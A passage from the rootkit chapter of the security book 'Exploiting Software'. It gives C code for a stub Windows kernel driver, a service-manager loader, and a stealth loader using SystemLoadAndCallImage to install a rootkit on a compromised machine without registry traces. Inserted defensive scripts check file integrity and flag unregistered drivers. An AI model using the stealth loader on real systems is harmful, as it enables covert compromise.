Exploiting Software: How to Break Code
By Greg Hoglund, Gary McGraw
Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512

How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.

Exploiting Software is loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.

This must-have book may shock you—and it will certainly educate you. Getting beyond the script kiddie treatment found in many hacking books, you will learn about

Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits

Exploiting Software is filled with the tools, concepts, and knowledge necessary to break software.

Chapter 8. Rootkits

Our final topic is exercising ultimate control over the machine. Ultimate control means things like a hacker on the other side of the planet controlling the electrical output of a single pin of the serial port on the target computer (the ultimate challenge might thus be to control the headphone jack on the CD-ROM drive).

This may all sound fanciful, but consider that all hardware is ultimately under the control of some kind of software. Much of this software is embedded in microchips and in the OS kernel. Once the OS has been hacked, the physical environment of the underlying computer is usually fully under the control of the attacker. Well-crafted, subversive programs can gain and control access to the microchips and the hardware of the physical machine itself. These programs exist at the lowest layer. This means they cannot be detected unless the system uses compartmentalized (specialized) hardware.

This chapter is about rootkits—the kind of exploit software that controls every aspect of a machine. Rootkits may be run locally or they may arrive via some other vector, like a worm. In fact, virus code, worms, and rootkits have many things in common. They are all typically very small pieces of code and are extremely tightly written. They all employ stealth techniques. They often use the same tricks to obtain their goals—tricks like call hooks and patches. Because worms are really a category of mobile code, the worm payload often uses many of these tricks to infect a target system once it arrives in the scene. A worm usually infects a target and leaves code behind, in effect becoming a rootkit.

Subversive Programs

Subversion of software is an old topic (by software standards anyway). There are military papers on the subject that date back more than 20 years. Subversion is about breaking into software using other software. The oldest references describe special "backdoors" placed into target software by the original programmers. Backdoors have been added to programs since computers were assemblies of vacuum tubes.

An old systems programmer once related the following story:

There was an anti-aircraft radar system used on the west coast of the United States that had a hidden program inside. The program would display a dancing hula girl. The system ran on vacuum tubes and used a light gun as part of the user interface. If you performed just the right series of commands, the hula girl would appear on the CRT and dance. If you shot the image with the light gun in just the right place, the character would shed its clothing. A colonel was once visiting during a systems test and discovered this "feature" quite by accident, much to the distress of the engineering team.

What Is a Rootkit?

A rootkit is a program that allows access to (and manipulation of) low-level functionality on the target machine. Sophisticated rootkits run in such a way that they can't be easily detected by other programs that usually monitor machine behavior. A rootkit usually provides this access only to people who know that it is running and is available to accept commands.

The original rootkits were Trojan'ed files that had backdoors installed in them. These rootkits would replace commonly accessed executable files such as "ps" and "netstat." Because this technique involved changing the size and makeup of the target executables, the original rootkits could be detected in a straightforward manner using file integrity-checking software such as Tripwire. Today's rootkits are much more sophisticated.
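The Tripwire-style check described above, as an added example that is not from the book: it records the size and SHA-256 digest of a set of binaries and later reports anything added, removed or modified. The file names (ps, netstat, ls) and their contents are constructed in a temporary directory for the demonstration; on a real system the baseline would be taken from a known-good install and stored off the machine.

```python
"""Added example (not from the book): a Tripwire-style file integrity check.
It records the size and SHA-256 digest of a set of binaries and later reports
anything added, removed or modified. The demo files and contents are constructed."""
import hashlib
import json
import os
import tempfile


def digest_file(path, chunk_size=65536):
    """SHA-256 of a file, streamed so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(paths):
    """Map each existing file to its size and digest; missing files are left out."""
    baseline = {}
    for path in paths:
        if os.path.isfile(path):
            baseline[path] = {"size": os.path.getsize(path), "sha256": digest_file(path)}
    return baseline


def save_baseline(baseline, path):
    with open(path, "w") as f:
        json.dump(baseline, f, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def check_against_baseline(baseline, paths):
    """Compare the files on disk now with a saved baseline."""
    current = build_baseline(paths)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "removed": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }


def _write(path, data):
    with open(path, "wb") as f:
        f.write(data)


def demo():
    """Constructed scenario in a temp dir: baseline ps and netstat, then simulate an
    old-style rootkit install (netstat trojaned at the same size, ps deleted, ls dropped)."""
    with tempfile.TemporaryDirectory() as d:
        ps, netstat, ls = (os.path.join(d, n) for n in ("ps", "netstat", "ls"))
        _write(ps, b"original ps binary")
        _write(netstat, b"original netstat binary")
        baseline_path = os.path.join(d, "baseline.json")
        save_baseline(build_baseline([ps, netstat]), baseline_path)

        _write(netstat, b"trojaned netstat binary")   # same length, different bytes
        os.remove(ps)
        _write(ls, b"dropped binary")

        report = check_against_baseline(load_baseline(baseline_path), [ps, netstat, ls])
        return {k: [os.path.basename(p) for p in v] for k, v in report.items()}


if __name__ == "__main__":
    print(demo())
```

The size comparison alone would miss the trojaned netstat in the demo, which is why the digest is recorded as well. The check is only as trustworthy as the kernel it runs on: a kernel rootkit of the kind this chapter goes on to describe sits below the file reads this script depends on, so for a suspect machine the baseline comparison belongs on media booted from a known-good source.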

Kernels

Kernel rootkits are very common today. They are installed as loadable modules or device drivers, and they provide hardware-level access to the machine. Because these programs are fully trusted, they can hide from any other software running on the machine.[1] Kernel rootkits can hide files and running processes, and in this way provide a backdoor to the target machine.

[1] Except for other rootkits using the same techniques, of course. Common rootkit techniques depend on being the first to arrive and set up camp to control a machine fully.

Kernel Rootkits and the Trusted Computing Base

Once code is injected into a trusted system you can often obtain the same level of access as a device driver or system-level program. On OSs like Windows and UNIX, this is a devastating level of access. This means that all parts of the target system can be compromised, and correspondingly that trusted sources of audit data can no longer be trusted. This also means that access control code can no longer really control access. As an example of the power we're talking about, recall the NT kernel patch we discussed in Chapter 3. That simple patch directly illustrates the ramifications of being able to alter code memory on a target system. Now imagine a sophisticated package of similar techniques, with an emphasis on staying hidden. That's a rootkit.


A Simple Windows XP Kernel Rootkit

In this section we discuss the construction of a simple Windows kernel rootkit that can hide processes and directories. This rootkit is written as a device driver and will support loading and unloading from memory. The example rootkit has been tested on Windows NT 4.0, Windows 2000, and Windows XP.

Writing a Rootkit

Our rootkit operates as a Windows 2000/XP device driver. This means we must have a build environment to create device drivers. We will use the highly available Windows XP DDK (device driver development kit). Interested readers can also use the Windows 2000 or Windows NT 4 DDK (http://www.microsoft.com/ddk/).

The DDK may require that Visual Studio be installed as well. Depending on the platform, you may also need the standard platform SDK. We encourage you to consult the documentation for the DDK version that is chosen.

The Checked Build Environment

The DDK provides two shells: the checked build environment and the free build environment. The checked build is a debug build, and the free build is a build for release code. We use the checked build. Once our software is working well, we can build using the free build. The free build will result in a much smaller driver file.

Files in the Rootkit Source

We program the rootkit using C. Thus all of our files end with the .c or the .h extension.

Building Things

To build the rootkit, "cd" into the source directory. From here, type "build" and the DDK build utility will handle the rest. If there are errors in your code, they will be written to stdout.

The SOURCES file is very important when building a device driver. The SOURCES file may be set up differently depending on the version of DDK that you are using. One particularly critical setting is the TARGETPATH environment variable. TARGETPATH is where objects will be placed. In the Win2k and XP DDK, the TARGETPATH must not be $(basedir)/lib, because this is disallowed in makefile.def. The special variable OBJ is already defined and points to a subdirectory that is controlled by the compiler. Readers are encouraged to simply use OBJ to specify the TARGETPATH.

The SOURCES setting is also important. It describes all the source files that will be used to build the driver. If multiple files are specified, they must be separated and each must occur on a single line. All but the last line must end in a backslash.

    SOURCES= file.c  \
             file2.c \
             file3.c

(Note: There is no trailing \ character.)

If we use a single basic.c file to build a driver, the SOURCES file will look something like this:

    TARGETNAME=BASIC
    TARGETPATH=OBJ
    TARGETTYPE=DRIVER
    SOURCES= basic.c

Kernel Drivers

Device drivers operate at ring-0, which means they have physical access to everything on the target computer. Under Windows, a driver is part of the trusted computing base of the computer. (Whether this is a good design is subject to much debate. Most computer security experts agree that it is not.) Let's write a simple device driver as step 1 of building a rootkit.

The Basic Structure of a Driver

The basic device driver has the following components:

The basic driver must include the DriverEntry function. This book is not devoted to device drivers, so we are not going to cover them in great detail. Instead, we encourage you to check out other standard references, including Dekker and Newcomer's Developing Windows NT Device Drivers: Programmer's Handbook [1999].

The main point to emphasize is that any code that you place in the DriverEntry function is going to be executed in ring-0 when the driver is loaded. It is possible to launch a driver in "fire-and-forget" mode; that is, simply stuff the driver into ring-0 and execute it without any sort of housekeeping with the OS. This is OK if you simply need to get some code to run in ring-0.[2]

[2] Of course you can really screw things up if you stuff buggy junk into this level, so be careful.

We want a driver that can be loaded and unloaded. The reason is that we want to test our code as we change it. If you "fire and forget" the driver, you may end up rebooting between each test, and this gets annoying very quickly. Our driver will be registered with the system so that we can start and stop it at will. Later on in the chapter we show you how to launch the driver without registering it. Launching a driver without registration means that you cannot use the normal OS methods to load, unload, start, and stop the driver. The thing is, if a driver is registered, it can be detected. Obviously a real rootkit would not want to be registered for stealth reasons!

When Programs Use a Driver

A user-mode program can use a driver by opening a file handle to it. Normally we would not build a traditional driver because our only goal is to get code into the kernel. In this example, however, we want our driver to "play nice," so we can load and unload it.

Typically a driver is available as a file handle, and a user-mode program can send data to it. The data are delivered in the form of IRPs (input/output request packets). To handle IRPs, the driver must register a callback routine. We show an example of this. Our stub routine simply completes IRPs, but does nothing with them. This is OK because we are not attempting to communicate with any user-mode programs.

To handle IRPs we must fill an array with function pointers to our callback:

    // Register a dispatch function.
    for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
    {
        theDriverObject->MajorFunction[i] = OnStubDispatch;
    }

Our callback function is very simple:

    NTSTATUS
    OnStubDispatch(
        IN PDEVICE_OBJECT DeviceObject,
        IN PIRP           Irp
        )
    {
        Irp->IoStatus.Status      = STATUS_SUCCESS;
        Irp->IoStatus.Information = 0;   // no data returned to the caller
        IoCompleteRequest (Irp, IO_NO_INCREMENT);
        // The IRP must not be touched once it has been completed, so return the
        // status by value rather than reading it back from Irp->IoStatus.
        return STATUS_SUCCESS;
    }

This routine simply completes all IRPs. All this means is that we discard everything we get and ignore it.

Normal drivers will always register a dispatch routine. However, because a rootkit does not need to communicate with user-mode programs, we can completely ignore the dispatch routine. This is good form, but it really doesn't matter because we are not attempting to communicate with user-mode programs.

Allowing the Driver to Be Unloaded

Most rootkits do not need to know how to unload themselves. Once a rootkit is installed you usually want it to remain loaded as long as the machine is running. However, as we have said, when you are building and testing a new rootkit, it makes sense to have an unload routine. This way you can load/unload the rootkit many times during development. Once testing is complete, you can remove the unload routine.

To allow a driver to be unloaded, we must register an unload routine. We can provide a pointer to the unload routine as such:

    theDriverObject->DriverUnload = OnUnload;

The unload routine is also very simple:

    VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
    {
        DbgPrint("ROOTKIT: OnUnload called\n");
    }

The complete code for a simple driver that can be loaded and unloaded from the kernel follows:

    // BASIC DEVICE DRIVER
    #include "ntddk.h"

    /* __________________________________________________________________
     . This function just completes all IRPs that come its way.
     . We are ignoring userland completely, so this shouldn't get
     . called anyway -
     . __________________________________________________________________ */
    NTSTATUS
    OnStubDispatch(
        IN PDEVICE_OBJECT DeviceObject,
        IN PIRP           Irp
        )
    {
        Irp->IoStatus.Status      = STATUS_SUCCESS;
        Irp->IoStatus.Information = 0;   // no data returned to the caller
        IoCompleteRequest (Irp, IO_NO_INCREMENT);
        // Do not read from the IRP after completing it; return the status by value.
        return STATUS_SUCCESS;
    }

    /* ____________________________________________________________________________
     . This is called when the driver is dynamically unloaded. You need to clean up
     . everything you have done here, called at IRQL_PASSIVE.
     . ____________________________________________________________________________ */
    VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
    {
        DbgPrint("ROOTKIT: OnUnload called\n");
    }

    NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
    {
        int i;

        DbgPrint("My Driver Loaded!");

        // Register a dispatch function.
        for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
        {
            theDriverObject->MajorFunction[i] = OnStubDispatch;
        }

        /* ___[ we NEED to register the Unload() function. ]___
         . this is how we are able to unload the
         . driver dynamically
         . ___________________________________________________ */
        theDriverObject->DriverUnload = OnUnload;

        return STATUS_SUCCESS;
    }

This basic driver code doesn't do anything very useful. If you're feeling ambitious, you can download and use the Dbgview tool from http://www.sysinternals.com and use it to see the debug messages from the DbgPrint function calls.

Registering the Driver

The following code can be used to register the driver. In this example, our driver is stored as c:\_root_.sys.

    // adv_loader.cpp : Defines the entry point for the console application.
    // code adapted from www.sysinternals.com on-demand driver loading code
    // --------------------------------------------------------------------
    // brought to you by ROOTKIT.COM
    // --------------------------------------------------------------------
    #include "stdafx.h"
    #include <windows.h>
    #include <process.h>
    #include <stdio.h>    // printf, puts
    #include <stdlib.h>   // exit

    void usage(char *p)
    {
        printf("Usage:\n%s l\t load driver from c:\\_root_.sys\n%s u\tunload driver\n", p, p);
    }

    int main(int argc, char* argv[])
    {
        if(argc != 2)
        {
            usage(argv[0]);
            exit(0);
        }

        if(*argv[1] == 'l')
        {
            printf("Registering Rootkit Driver.\n");

            SC_HANDLE sh = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
            if(!sh)
            {
                puts("error OpenSCManager");
                exit(1);
            }
            // Creates the service entry under HKLM\SYSTEM\CurrentControlSet\Services\_root_
            SC_HANDLE rh = CreateService(
                                sh,
                                "_root_",
                                "_root_",
                                SERVICE_ALL_ACCESS,
                                SERVICE_KERNEL_DRIVER,
                                SERVICE_DEMAND_START,
                                SERVICE_ERROR_NORMAL,
                                "C:\\_root_.sys",
                                NULL,
                                NULL,
                                NULL,
                                NULL,
                                NULL);
            if(!rh)
            {
                if (GetLastError() == ERROR_SERVICE_EXISTS)
                {
                    // service exists
                    rh = OpenService(
                                sh,
                                "_root_",
                                SERVICE_ALL_ACCESS);
                    if(!rh)
                    {
                        puts("error OpenService");
                        CloseServiceHandle(sh);
                        exit(1);
                    }
                }
                else
                {
                    puts("error CreateService");
                    CloseServiceHandle(sh);
                    exit(1);
                }
            }
            // Release both handles (the original listing left them open).
            CloseServiceHandle(rh);
            CloseServiceHandle(sh);
        }
        else if(*argv[1]=='u')
        {
            SERVICE_STATUS ss;
            printf("Unloading Rootkit Driver.\n");
            SC_HANDLE sh = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
            if(!sh)
            {
                puts("error OpenSCManager");
                exit(1);
            }
            SC_HANDLE rh = OpenService(
                                sh,
                                "_root_",
                                SERVICE_ALL_ACCESS);
            if(!rh)
            {
                puts("error OpenService");
                CloseServiceHandle(sh);
                exit(1);
            }
            if(!ControlService(rh, SERVICE_CONTROL_STOP, &ss))
            {
                puts("warning: could not stop service");
            }
            if (!DeleteService(rh))
            {
                puts("warning: could not delete service");
            }
            CloseServiceHandle(rh);
            CloseServiceHandle(sh);
        }
        else usage(argv[0]);
        return 0;
    }

The program can be used with the l and u flags to register the driver and unregister the driver, respectively. Remember, we can use this program while we test the driver or when the driver is in development. Once the driver is registered, the user can issue the commands net start _root_ to start the rootkit and net stop _root_ to stop the rootkit.

Using SystemLoadAndCallImage

Now that we have shown you the "nice" way of registering a driver, let's assume you have penetrated a system and you want to install the rootkit. Registering a driver on somebody else's machine (the target) is not a good idea because it will place entries in the registry and may lead to detection. Using an undocumented NT native API call, SetSystemInformation, we can cause a driver to be loaded and executed directly in a single operation. This move does not require any registration. However, it also means that once the driver is loaded, it cannot be unloaded! Our program will now survive in memory until the next reboot. Another side effect is that we can load the driver multiple times during a single session. Normally a driver can only be loaded once, but using our special system call we can load and execute as many copies of the driver as we wish—at once.

The code for the custom loading program follows. It assumes the rootkit is located at c:\_root_.

// basic loading program to install rootkit into kernel
// ----------------------------------------------------
// www.rootkit.com
// ----------------------------------------------------

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
#ifdef MIDL_PASS
    [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
    PWSTR Buffer;
#endif // MIDL_PASS
} UNICODE_STRING, *PUNICODE_STRING;

typedef long NTSTATUS;

#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

// Resolved at run time from ntdll.dll; neither call is in the public SDK headers.
NTSTATUS (__stdcall *ZwSetSystemInformation)(
    IN DWORD SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength
);

VOID (__stdcall *RtlInitUnicodeString)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
);

typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
    UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;

#define SystemLoadAndCallImage 38

int main(void)
{
    ///////////////////////////////////////////////////////////////
    // Why mess with drivers?
    ///////////////////////////////////////////////////////////////
    SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
    WCHAR daPath[] = L"\\??\\C:\\BASIC.SYS";

    //////////////////////////////////////////////////////////////
    // Get DLL entry points.
    //////////////////////////////////////////////////////////////
    if(!(RtlInitUnicodeString = (void *)
            GetProcAddress(
                GetModuleHandle("ntdll.dll")
                ,"RtlInitUnicodeString"
            )
        )
    )
    {
        exit(1);
    }

    if(!(ZwSetSystemInformation = (void *)
            GetProcAddress(
                GetModuleHandle("ntdll.dll")
                ,"ZwSetSystemInformation"
            )
        )
    )
    {
        exit(1);
    }

    // Build the counted UNICODE_STRING that names the driver image.
    RtlInitUnicodeString(
        &(GregsImage.ModuleName)
        ,daPath
    );

    // One call loads the image and runs its entry point; no service is created.
    if(
        NT_SUCCESS(
            ZwSetSystemInformation(
                SystemLoadAndCallImage
                ,&GregsImage
                ,sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)
            )
        )
    )
    {
        printf("Rootkit Loaded.\n");
    }
    else
    {
        printf("Rootkit not loaded.\n");
    }

    return 0;
}
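As an added example (not code from the book or from rootkit.com), here is the defender's side of the two loading methods shown above: SCM registration leaves a driver service key under HKLM\SYSTEM\CurrentControlSet\Services, a SystemLoadAndCallImage load does not, so a loaded kernel module that matches no driver service ImagePath deserves a look. The psapi and winreg calls are real Win32 and Python APIs and run only on Windows; the path-normalization rules and the allowlist of kernel images that are never services are assumptions to be tuned against a clean baseline.

```python
import ctypes, os

SYSTEM_ROOT = os.environ.get("SystemRoot", r"C:\Windows").lower()
# Assumed allowlist: kernel-mode images that are never services; extend after baselining a clean host.
KNOWN_NON_SERVICE_IMAGES = {"ntoskrnl.exe", "hal.dll", "kdcom.dll", "ci.dll", "pshed.dll"}

def normalize_image_path(path):
    # \??\C:\x.sys, \SystemRoot\x.sys, %SystemRoot%\x.sys and x.sys must compare equal.
    p = path.strip().strip('"').replace("/", "\\").lower()
    for prefix in ("\\??\\", "\\systemroot\\", "%systemroot%\\", SYSTEM_ROOT + "\\"):
        if p.startswith(prefix):
            p = p[len(prefix):]
    return p.lstrip("\\")

def unregistered_drivers(loaded_paths, registered_image_paths):
    # Loaded images whose normalized path matches no driver service ImagePath.
    registered = {normalize_image_path(p) for p in registered_image_paths}
    return [p for p in loaded_paths if normalize_image_path(p) not in registered
            and normalize_image_path(p).rsplit("\\", 1)[-1] not in KNOWN_NON_SERVICE_IMAGES]

def loaded_driver_paths():
    # Loaded kernel modules via psapi (Windows only), however they were brought in.
    psapi = ctypes.WinDLL("psapi")
    needed = ctypes.c_ulong()
    psapi.EnumDeviceDrivers(None, 0, ctypes.byref(needed))
    bases = (ctypes.c_void_p * (needed.value // ctypes.sizeof(ctypes.c_void_p)))()
    psapi.EnumDeviceDrivers(bases, needed.value, ctypes.byref(needed))
    buf, paths = ctypes.create_unicode_buffer(1024), []
    for base in bases:
        if psapi.GetDeviceDriverFileNameW(ctypes.c_void_p(base), buf, 1024):
            paths.append(buf.value)
    return paths

def registered_driver_image_paths():
    # ImagePath of every kernel (Type 1) or file-system (Type 2) driver service.
    import winreg
    paths = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services") as root:
        for i in range(winreg.QueryInfoKey(root)[0]):
            name = winreg.EnumKey(root, i)
            try:
                with winreg.OpenKey(root, name) as k:
                    vals = dict(winreg.EnumValue(k, j)[:2] for j in range(winreg.QueryInfoKey(k)[1]))
            except OSError:  # a few protected keys deny access
                continue
            if vals.get("Type") in (1, 2):  # no ImagePath means the default drivers directory
                paths.append(vals.get("ImagePath", r"system32\drivers\%s.sys" % name))
    return paths
if __name__ == "__main__" and os.name == "nt":  # report on the local host
    print(*unregistered_drivers(loaded_driver_paths(), registered_image_paths()), sep="\n")
```

Run it elevated; a hit is a lead, not a verdict, since legitimate images placed outside %SystemRoot% or loaded by other non-service paths will also show up until the prefix list and allowlist are tuned.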

You are now armed with everything you need to write a simple device driver and load/unload the driver from the kernel. Next, we will explore tricks for hiding files, directories, and processes on the system.